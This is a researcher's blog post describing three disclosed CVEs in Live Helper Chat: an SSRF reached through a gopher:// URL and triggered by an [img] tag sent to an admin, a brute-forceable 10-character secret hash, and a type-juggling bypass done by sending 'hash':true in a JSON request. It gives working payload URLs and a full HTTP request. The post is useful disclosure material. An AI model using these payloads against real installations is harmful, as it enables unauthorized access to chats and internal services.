<!DOCTYPE html>
<html>
<style>

		@font-face { font-family: "gohu"; src: url("/gohu.woff") format('woff'); }
		html {
			background: url('/4rt3/g3n3r4t1v3/sketch_220308a/out.gif') no-repeat center/100% fixed;
		}
		body {
			font-family: 'gohu', monospace;
			max-width: 50em;
			margin: 0 auto;
			color: white;
			line-height: calc(1ex / 0.32);
			margin-top: 3em;
		}
		pre {
			font-family: 'gohu', monospace;
			white-space: pre-wrap;
			line-height: 125%;
      background-color: #111;
      padding: 1em;
		}
		@media only screen and (max-width:768px) {
			body {
				max-width:100%;
			}
		}
		a:link {
			color: #0a0 ;
		}
		a:visited {
			color: #004100 ;
		}
		td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		.codehilite .hll { background-color: #0000ff }
		.codehilite { background: #000000; }
		.codehilite .c { color: #00ff00 } /* Comment */
		.codehilite .k { color: #ff0000 } /* Keyword */
		.codehilite .ch { color: #00ff00 } /* Comment.Hashbang */
		.codehilite .cm { color: #00ff00 } /* Comment.Multiline */
		.codehilite .cp { color: #e5e5e5 } /* Comment.Preproc */
		.codehilite .cpf { color: #00ff00 } /* Comment.PreprocFile */
		.codehilite .c1 { color: #00ff00 } /* Comment.Single */
		.codehilite .cs { color: #00ff00 } /* Comment.Special */
		.codehilite .kc { color: #ff0000 } /* Keyword.Constant */
		.codehilite .kd { color: #ff0000 } /* Keyword.Declaration */
		.codehilite .kn { color: #ff0000 } /* Keyword.Namespace */
		.codehilite .kp { color: #ff0000 } /* Keyword.Pseudo */
		.codehilite .kr { color: #ff0000 } /* Keyword.Reserved */
		.codehilite .kt { color: #ee82ee } /* Keyword.Type */
		.codehilite .s { color: #87ceeb } /* Literal.String */
		.codehilite .no { color: #7fffd4 } /* Name.Constant */
		.codehilite .nf { color: #ffff00 } /* Name.Function */
		.codehilite .nv { color: #eedd82 } /* Name.Variable */
		.codehilite .sa { color: #87ceeb } /* Literal.String.Affix */
		.codehilite .sb { color: #87ceeb } /* Literal.String.Backtick */
		.codehilite .sc { color: #87ceeb } /* Literal.String.Char */
		.codehilite .dl { color: #87ceeb } /* Literal.String.Delimiter */
		.codehilite .sd { color: #87ceeb } /* Literal.String.Doc */
		.codehilite .s2 { color: #87ceeb } /* Literal.String.Double */
		.codehilite .se { color: #87ceeb } /* Literal.String.Escape */
		.codehilite .sh { color: #87ceeb } /* Literal.String.Heredoc */
		.codehilite .si { color: #87ceeb } /* Literal.String.Interpol */
		.codehilite .sx { color: #87ceeb } /* Literal.String.Other */
		.codehilite .sr { color: #87ceeb } /* Literal.String.Regex */
		.codehilite .s1 { color: #87ceeb } /* Literal.String.Single */
		.codehilite .ss { color: #87ceeb } /* Literal.String.Symbol */
		.codehilite .fm { color: #ffff00 } /* Name.Function.Magic */
		.codehilite .vc { color: #eedd82 } /* Name.Variable.Class */
		.codehilite .vg { color: #eedd82 } /* Name.Variable.Global */
		.codehilite .vi { color: #eedd82 } /* Name.Variable.Instance */
		.codehilite .vm { color: #eedd82 } /* Name.Variable.Magic */
	
</style>
<head>
  <meta charset="UTF-8">
</head>

<body><h1>Live Helper Chat CVEs</h1>
<p>1649737152</p>
<p>Did a secure code review on Live Helper Chat as part of a pentest, found some CVEs, and learned some tricks that I think are cool to have in mind while doing bug bounty.</p>
<h2>Authenticated SSRF - <a href="https://huntr.dev/bounties/7264a2e1-17e7-4244-93e4-49ec14f282b3/">CVE-2022-1191</a></h2>
<p>An easy SSRF on <code>http://127.0.0.1/index.php/cobrowse/proxycss/1?base=gopher://0:80/xGET%20/&amp;css=</code> , with some host bypassing. Nothing much here, but you need to be authenticated, altho there's no CSRF protection the cookie has <code>SameSite=Lax</code> :c</p>
<p>Just send the SSRF link on the chat as an image (;</p>
<p><code>[img]https://demo.livehelperchat.com/index.php/cobrowse/proxycss/1?base=gopher://0:80/xGET%20/&amp;css=[/img]</code></p>
<p>When the Admin sees the "image" the SSRF will trigger, a nice little chain to prove impact.</p>
<h2>Weak secret - <a href="https://huntr.dev/bounties/92f7b2d4-fa88-4c62-a2ee-721eebe01705/">CVE-2022-1235</a></h2>
<p>The application used secretHash as a secret on lots of functionalities, but it was defined as :</p>
<pre class="codehilite"><code class="language-php">&lt;?
$cfgSite-&gt;setSetting( 'site', 'secrethash', substr(md5(time() . &quot;:&quot; . mt_rand()),0,10));
</code></pre>

<p>10 characters of only hexadecimal, making 16^10 possilibities ( 1.099.511.627.776 ), totally brute-forceable. Also, don't use mt_rand, it's pretty broken. You can get an sha1 of it on the captcha :</p>
<pre class="codehilite"><code class="language-php">&lt;?
$hash = sha1(erLhcoreClassIPDetect::getIP() . $Params['user_parameters']['timets'] . erConfigClassLhConfig::getInstance()-&gt;getSetting( 'site', 'secrethash' ));
</code></pre>

<p>You know every argument but the hash, pass it to hashcat and profit.</p>
<p>For bug bounty, trying to guess how hashes are generated is a valid strategy, better if you can reverse engineer it on a mobile app or some javascript, found a couple of bugs that way.</p>
<h2>Type Juggling 2 IDOR - <a href="https://huntr.dev/bounties/3e30171b-c9bf-415c-82f1-6f55a44d09d3/">CVE-2022-1176</a></h2>
<p>The app used loose comparison on a security feature, if you have the hash you can read the content</p>
<pre class="codehilite"><code class="language-php">&lt;?
    if ($chat instanceof erLhcoreClassModelChat &amp;&amp; $chat-&gt;hash == $requestPayload['hash'])
</code></pre>

<p>But it accepts JSON as input, oh no (ﾉಥ益ಥ)ﾉ</p>
<pre class="codehilite"><code class="language-php">&lt;?
$requestPayload = json_decode(file_get_contents('php://input'),true);
</code></pre>

<p>just replace it to true and bypass the check (づ｡◕‿‿◕｡)づ</p>
<pre class="codehilite"><code>POST /eng/widgetrestapi/fetchmessages HTTP/1.1
Host: demo.livehelperchat.com
Cookie: lhc_vid=eb9bc0c044919538c5b1
Content-Length: 62
Sec-Ch-Ua: &quot;(Not(A:Brand&quot;;v=&quot;8&quot;, &quot;Chromium&quot;;v=&quot;99&quot;
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Sec-Ch-Ua-Platform: &quot;macOS&quot;
Origin: https://demo.livehelperchat.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.livehelperchat.com/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
   &quot;chat_id&quot;:2,
   &quot;hash&quot;:true,
   &quot;lmgsid&quot;:1,
   &quot;theme&quot;:1,
   &quot;new_chat&quot;:true
}
</code></pre>

<p>Every time I see a JSON now I'll put a true somewhere.</p>
<h2>Closing thoughts</h2>
<p>Always chain authenticated vulnerabilities, not ignore hashes, and put true ( or Array ) every-fucking-where.</p>
<p>Also, shoutout to <a href="https://huntr.dev">huntr.dev</a>, made it really easy to send the vulnerabilities and talk directly to the dev, they also managed the whole CVE process, having a bounty on projects on github is really nice (altho small at the moment, &gt;0 is nice anyway) I don't have any clue how they make money :p</p></body><hr>by <a href='https://twitter.com/caioluders'>@caioluders</a></html>